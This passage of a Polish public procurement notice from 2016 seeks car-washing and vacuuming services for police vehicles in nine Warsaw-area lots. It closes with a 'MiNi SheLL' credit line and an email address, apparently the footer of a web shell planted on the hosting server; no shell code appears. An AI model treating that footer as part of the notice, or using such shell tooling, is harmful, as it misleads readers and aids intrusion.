              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zamawiający dopuszcza zmianę cen, o których mowa w Rozdz. XVII § 1 ust. 5 ust. 1 dokumentacji przetargowej oraz wartości umowy, o której mowa w Rozdz. XVII § 1 ust. 4 dokumentacji przetargowej w przypadku zmiany:
1) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 - 5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę,
2) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.
2. Zamawiający dopuszcza zmianę umowy w zakresie stawki podatku VAT, wskazanej w Rozdz. XVII § 1 ust. 5 pkt 2 dokumentacji przetargowej oraz wartości umowy wskazanej w Rozdz. XVII § 1 ust. 4 dokumentacji przetargowej - w przypadku ustawowej zmiany podatku VAT<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/12/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie działania Komendy Rejonowej Policji Warszawa V<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie działania Komendy Rejonowej Policji Warszawa V, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie działania Komendy Rejonowej Policji Warszawa VI<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie działania Komendy Rejonowej Policji Warszawa VI, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie działania Komendy Rejonowej Policji Warszawa VII<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie działania Komendy Rejonowej Policji Warszawa VII, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu mińskiego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu mińskiego, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu nowodworskiego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu nowodworskiego, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu otwockiego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu otwockiego, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu pruszkowskiego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu pruszkowskiego, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług czyszczenia odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu wołomińskiego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu wołomińskiego, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu warszawskiego zachodniego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji zlokalizowanych na terenie powiatu warszawskiego zachodniego, realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50112300-6, 30163000-9,
                    39235000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com